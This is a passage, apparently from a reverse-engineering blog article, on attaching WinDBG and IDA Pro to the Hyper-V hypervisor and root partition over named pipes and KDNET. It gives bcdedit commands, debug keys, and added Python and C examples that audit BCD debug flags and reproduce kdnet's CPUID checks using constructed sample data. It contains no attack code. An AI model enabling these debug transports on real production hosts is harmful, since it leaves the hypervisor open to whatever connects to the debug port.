<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG.exe -b -k com:port=\\.\pipe\Vm1,pipe,reconnect,resets=0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This connects the debugger to the root partition. Then execute the <b>g</b> command several times, after which vmdemux reports:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="231" src="https://lh3.googleusercontent.com/cq0jJj4r9kqiSw3TVgqqvZe7kVgwdBQHbWQMao3lm4RHul50HOJDoMUAR3Gp53cporLs1-01ExvXUb6SuelOuHjRlg-ZAw_BakpYv1kqeC2g4UQRoo9EyyohQkVkx_4V0gKymixp9ChTOI0f" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="450" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, IDA PRO can be connected directly to the hypervisor via the named pipe \\.\Pipe\Vm0 by choosing WinDBG as the debugger and specifying the following connection string in the process options: </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">com:port=\\.\pipe\Vm0,pipe,resets=0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the following message appears, choose </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Same</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="144" src="https://lh5.googleusercontent.com/GGhZ6Hn-QliK41MbxedjxLTu5hSOcQP1djrBr3Djv1cOMwAqzJRLNcS4jtKy3P5-JNL-Br-vCc8YDebaYN6MWN_K9DrOMZShC7F8omf1yavHOXAnmqTdA2kmlHPZBzed5C_jdPuQjnGbwMYi" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="435" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The debugger will stop within the hypervisor:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="108" src="https://lh5.googleusercontent.com/RmOBae1XCH5PMBZ5dIyvo3IGlWUZhHfzxGjMGcK5p0H3ncEvzIgREQlQpGVciJ_v-qoQiOUFIThcppM152Typ3Pq1rRshN88jBxoV9ygSTPIRJTYZPgC0mwF4dUFounK1cvE3WKEEN4EtyKx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="459" /></span></div>
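<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following Python script is an added example and is not part of the original article. It parses the two-column listing that bcdedit prints and checks that the root partition's boot configuration matches the settings configured in the steps above (serial transport on DEBUGPORT 1 at BAUDRATE 115200, hypervisordebug, hypervisorlaunchtype auto, dbgtransport kdhvcom.dll, debug and bootdebug), so the configuration can be verified before the reboot instead of discovering a typo while the boot hangs waiting for a debugger. The same parser serves as an audit check: on a production Hyper-V host none of hypervisordebug, debug or bootdebug should be enabled, because each of them lets whatever is attached to the debug transport take control of the hypervisor or the root partition at boot. The bcdedit output embedded in the script is constructed to resemble the real listing (name, padding, value) and was not captured from a host; on a live Windows host the three texts come from bcdedit /hypervisorsettings, bcdedit /dbgsettings and bcdedit /enum {current}, which the live_settings helper runs.</span></div>

```python
"""Verify the Hyper-V debug settings in the BCD store.

Added example, not code from the article. It checks that bcdedit output
matches the lab configuration from the text and doubles as an audit that
flags hosts which still have hypervisor/kernel debugging enabled.
"""
import re
import subprocess
from typing import Dict, List

# Constructed sample output shaped like bcdedit's two-column listing
# (a name, at least two spaces, then the value). Not captured from a host.
SAMPLE_HV = """\
The hypervisor debugger settings are:
debugtype               Serial
debugport               1
baudrate                115200

The operation completed successfully.
"""

SAMPLE_DBG = """\
debugtype               Serial
debugport               1
baudrate                115200

The operation completed successfully.
"""

SAMPLE_LOADER = r"""
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \WINDOWS\system32\winload.exe
description             Windows Server 2016 TP2
hypervisorlaunchtype    Auto
hypervisordebug         Yes
dbgtransport            kdhvcom.dll
debug                   Yes
bootdebug               Yes
"""

# Values the article's bcdedit commands are expected to produce.
EXPECTED_SERIAL = {"debugtype": "serial", "debugport": "1", "baudrate": "115200"}
EXPECTED_LOADER = {
    "hypervisorlaunchtype": "auto",
    "hypervisordebug": "yes",
    "dbgtransport": "kdhvcom.dll",
    "debug": "yes",
    "bootdebug": "yes",
}
# Any of these set to Yes means a debugger can take control at boot.
DEBUG_FLAGS = ("hypervisordebug", "debug", "bootdebug")

# A setting line is one token, two or more spaces, then the value. Sentences
# such as "The operation completed successfully." use single spaces and
# therefore do not match, nor do headers like "Windows Boot Loader".
_SETTING = re.compile(r"^(\S+)\s{2,}(.+?)\s*$")


def parse_bcdedit(text: str) -> Dict[str, str]:
    """Turn bcdedit's listing into {name: value}; names are lowercased."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        match = _SETTING.match(line.strip())
        if match:
            settings[match.group(1).lower()] = match.group(2)
    return settings


def check_config(hv: Dict[str, str], dbg: Dict[str, str],
                 loader: Dict[str, str]) -> List[str]:
    """Return mismatches against the lab setup; an empty list means it matches."""
    problems: List[str] = []
    for name, settings in (("hypervisorsettings", hv), ("dbgsettings", dbg)):
        for key, want in EXPECTED_SERIAL.items():
            got = settings.get(key, "<missing>")
            if got.lower() != want:
                problems.append(f"{name}: {key} is {got!r}, expected {want!r}")
    for key, want in EXPECTED_LOADER.items():
        got = loader.get(key, "<missing>")
        if got.lower() != want:
            problems.append(f"loader: {key} is {got!r}, expected {want!r}")
    return problems


def debug_exposed(loader: Dict[str, str]) -> bool:
    """True if the boot entry lets a debugger attach to the hypervisor or kernel."""
    return any(loader.get(flag, "No").lower() == "yes" for flag in DEBUG_FLAGS)


def live_settings() -> Dict[str, Dict[str, str]]:
    """Read the real BCD store (Windows only, needs an elevated prompt)."""
    def run(*args: str) -> str:
        return subprocess.run(["bcdedit", *args], capture_output=True,
                              text=True, check=True).stdout
    return {"hv": parse_bcdedit(run("/hypervisorsettings")),
            "dbg": parse_bcdedit(run("/dbgsettings")),
            "loader": parse_bcdedit(run("/enum", "{current}"))}


if __name__ == "__main__":
    try:
        cfg = live_settings()
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("bcdedit not available, using the constructed sample output")
        cfg = {"hv": parse_bcdedit(SAMPLE_HV), "dbg": parse_bcdedit(SAMPLE_DBG),
               "loader": parse_bcdedit(SAMPLE_LOADER)}
    for problem in check_config(cfg["hv"], cfg["dbg"], cfg["loader"]):
        print("mismatch:", problem)
    print("debugger can attach at boot:", debug_exposed(cfg["loader"]))
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run it in the root partition right after the bcdedit commands: an empty mismatch list means the reboot will go straight to the debugger handshake. Run over the boot entries of hosts that are not debugging labs, debug_exposed returning True is the finding to act on, since a serial or network debug transport left enabled is equivalent to leaving the hypervisor open to anything connected to that port.</span></div>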
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As we can see, compared with Windows Server 2012 (R2) there is a new module – kdstub.dll. Earlier hypervisor versions were statically linked with the debug library and had a huge file size (2-3 MB); the current version of hvix64.exe is 932 KB.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At later stages kdstub.dll is replaced by the appropriate debug transport module, e.g. kd_02_8086.dll (for network debugging):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="116" src="https://lh3.googleusercontent.com/PXBNZr7vlXiVM-_2Lnhc87MBXiNFi7dIeAJjBQJsXKrUmGOnQ6NjuYWnZNvV4oOYn4JmlXxPEd4hAEpMsit3EabDHpSKR0YkvIJNA3X5jVzQ3cgdJTaDP3BZDbUwOEWkhiRUerD_9u6ZEgoy" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="362" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Starting with the Windows Server 2012 hypervisor it became possible to debug over the network; at the time the article was written there was no description of this method on MSDN, but a little digging in the help of the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> utility lets you find the options you need.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To do this in Windows Server 2016 TP2, run the following commands:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set dbgtransport kdnet.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /debug yes</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /dbgsettings net hostip:192.168.2.1 port:50002</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In response, the command displays the connection string of the root partition.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings NET HOSTIP:192.168.2.1 PORT:50000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In response, the command displays the connection string of the hypervisor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the VMware virtual machine configuration, add a Host Only adapter, go into the virtual network settings to configure DHCP for that adapter, and make sure that Windows Server 2016 TP2 is actually assigned an address on it, for example by running the command ipconfig /renew.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then run two instances of IDA Pro, set the debugger type to KernelMode and set </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Options->Connection string </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">to the corresponding line printed by the commands above:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50002,Key=pv1l8rzwhxhz.2vpkq86oc8zwg.tly17iosgzm8.1h7r18svpji4p - the root partition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50000,Key=3fkmf6l8a1tnd.3tsxig92rw4cc.2l0dhyq3p24qj.rgbz64xkofc0 - hypervisor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This gives you the ability to debug the root partition and the hypervisor simultaneously.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings nodhcp </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">option lets the debug transport in network mode use the IP address of the root partition instead of requesting one via DHCP. In this case, configuring DHCP in VMware is not necessary.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can also use kdnet.exe (10), which is included in Debugging Tools for Windows 10, to configure the root partition for debugging:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kdnet.exe 192.168.2.1 50002</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You will see the message “Microsoft hypervisor supports using KDNET in guest VMs”:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="148" src="https://lh6.googleusercontent.com/DtAAl-nOjCt1h2mODKa10moI9mo1LcTEknsjHslpULr6IkCq34aEScQtNizEKFFj8tHEr0Puzv1ytXKpOYhJK8UKTRtvPRmKmZ-woXPoNgPXrpJaGF0qUkm1iC9hTVjBcjL5ky-9OWwABGdL" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="462" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To check this feature, kdnet.exe does the following:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Detects the presence of a hypervisor: cpuid(1), ecx[31] must be equal to 1.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Checks the Hypervisor Vendor ID Signature: cpuid(0x40000000) must return “Microsoft Hv” in the ebx, ecx, edx registers.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Checks the Hypervisor Interface Signature: cpuid(0x40000001), eax must contain “Hv#1”.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Checks the build number: cpuid(0x40000002), it must be equal to or above 0x23F0. If it is below, the following message appears:</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Microsoft hypervisor running this VM does not support KDNET. Please upgrade to the hypervisor shipped in Windows 8 or WS2012 or later.</span></div>
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally, executes cpuid(0x40000003) and checks that ebx[12] is 1 (which means that the partition was created with the CpuManagement flag).</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If all checks pass, kdnet prints the message that KDNET is supported.</span></div>
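<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The same five-step check, written here as an added example in C (it is not kdnet.exe's own code): the decision logic runs on register values that are fed in, so it can be exercised with a constructed sample, while on x86 GCC/Clang builds main() fills the structure from the real CPUID instruction. The type and function names (hv_cpuid_t, kdnet_check, chars_to_reg and so on) are this example's own assumptions.</span></div>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__GNUC__) && (defined(__x86_64__) || defined(__i386__))
#include <cpuid.h>               /* provides the __cpuid() macro used below */
#define HAVE_CPUID 1
#endif

#define HV_MIN_BUILD           0x23F0u     /* oldest build number kdnet accepts */
#define HV_FEAT_CPU_MANAGEMENT (1u << 12)  /* cpuid(0x40000003).ebx[12] */

/* Raw register values; filled from real CPUID or constructed for a test. */
typedef struct {
    uint32_t leaf1_ecx;                          /* cpuid(1).ecx */
    uint32_t vendor_ebx, vendor_ecx, vendor_edx; /* cpuid(0x40000000) */
    uint32_t iface_eax;                          /* cpuid(0x40000001).eax */
    uint32_t build_eax;                          /* cpuid(0x40000002).eax */
    uint32_t feat_ebx;                           /* cpuid(0x40000003).ebx */
} hv_cpuid_t;

typedef enum {
    KDNET_SUPPORTED = 0,
    KDNET_NO_HYPERVISOR,     /* cpuid(1).ecx[31] is clear */
    KDNET_NOT_MICROSOFT_HV,  /* vendor signature is not "Microsoft Hv" */
    KDNET_BAD_INTERFACE,     /* interface signature is not "Hv#1" */
    KDNET_BUILD_TOO_OLD,     /* build number below 0x23F0 */
    KDNET_NO_CPU_MANAGEMENT  /* partition created without CpuManagement */
} kdnet_result_t;

/* CPUID strings are little-endian: byte 0 of the string is in bits 7:0. */
static void reg_to_chars(uint32_t reg, char *out)
{
    for (int i = 0; i < 4; i++) out[i] = (char)((reg >> (8 * i)) & 0xffu);
}

/* Inverse of reg_to_chars; used to build constructed register values. */
uint32_t chars_to_reg(const char *s)
{
    uint32_t reg = 0;
    for (int i = 0; i < 4; i++) reg |= (uint32_t)(unsigned char)s[i] << (8 * i);
    return reg;
}

/* Vendor signature: "Micr" in ebx, "osof" in ecx, "t Hv" in edx. */
void hv_vendor_string(const hv_cpuid_t *c, char out[13])
{
    reg_to_chars(c->vendor_ebx, out);
    reg_to_chars(c->vendor_ecx, out + 4);
    reg_to_chars(c->vendor_edx, out + 8);
    out[12] = '\0';
}

/* The five checks, in the order kdnet.exe performs them. */
kdnet_result_t kdnet_check(const hv_cpuid_t *c)
{
    char vendor[13], iface[5] = {0};
    if (!(c->leaf1_ecx & (1u << 31)))            /* 1. hypervisor present? */
        return KDNET_NO_HYPERVISOR;
    hv_vendor_string(c, vendor);                 /* 2. vendor ID signature */
    if (strcmp(vendor, "Microsoft Hv") != 0)
        return KDNET_NOT_MICROSOFT_HV;
    reg_to_chars(c->iface_eax, iface);           /* 3. interface signature */
    if (strcmp(iface, "Hv#1") != 0)
        return KDNET_BAD_INTERFACE;
    if (c->build_eax < HV_MIN_BUILD)             /* 4. build number */
        return KDNET_BUILD_TOO_OLD;
    if (!(c->feat_ebx & HV_FEAT_CPU_MANAGEMENT)) /* 5. CpuManagement flag */
        return KDNET_NO_CPU_MANAGEMENT;
    return KDNET_SUPPORTED;
}

/* Constructed sample: a partition that passes every check at the minimum build. */
hv_cpuid_t kdnet_sample_hyperv(void)
{
    hv_cpuid_t c = { 1u << 31, chars_to_reg("Micr"), chars_to_reg("osof"),
                     chars_to_reg("t Hv"), chars_to_reg("Hv#1"),
                     HV_MIN_BUILD, HV_FEAT_CPU_MANAGEMENT };
    return c;
}

#ifdef HAVE_CPUID
/* Fill the structure from the CPU this program runs on (x86 GCC/Clang only). */
void kdnet_query_cpuid(hv_cpuid_t *c)
{
    uint32_t a, b, cx, d;
    __cpuid(1, a, b, cx, d);          c->leaf1_ecx = cx;
    __cpuid(0x40000000, a, b, cx, d); c->vendor_ebx = b; c->vendor_ecx = cx; c->vendor_edx = d;
    __cpuid(0x40000001, a, b, cx, d); c->iface_eax = a;
    __cpuid(0x40000002, a, b, cx, d); c->build_eax = a;
    __cpuid(0x40000003, a, b, cx, d); c->feat_ebx = b;
}
#endif

int main(void)
{
    hv_cpuid_t c = kdnet_sample_hyperv();  /* constructed data for non-x86 builds */
#ifdef HAVE_CPUID
    kdnet_query_cpuid(&c);                  /* real CPUID on x86 GCC/Clang builds */
#endif
    printf("kdnet check result: %d (0 = KDNET supported), build 0x%x\n",
           (int)kdnet_check(&c), c.build_eax);
    return 0;
}
```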
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you configure a guest virtual machine, kdnet.exe prints an additional message:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">C:\Program Files\Windows Kits\10\Debuggers\x86>kdnet 10.0.0.1 50020</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enabling network debugging on Microsoft Hypervisor Virtual Machine.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Key=3d1uhidq70zko.3uge1t58fhyaa.2ybt7ue2dbmou.1ehlagdp52dvg</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To finish setting up KDNET for this VM, run the following command from an</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">elevated command prompt running on the Windows hyper-v host. (NOT this VM!)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
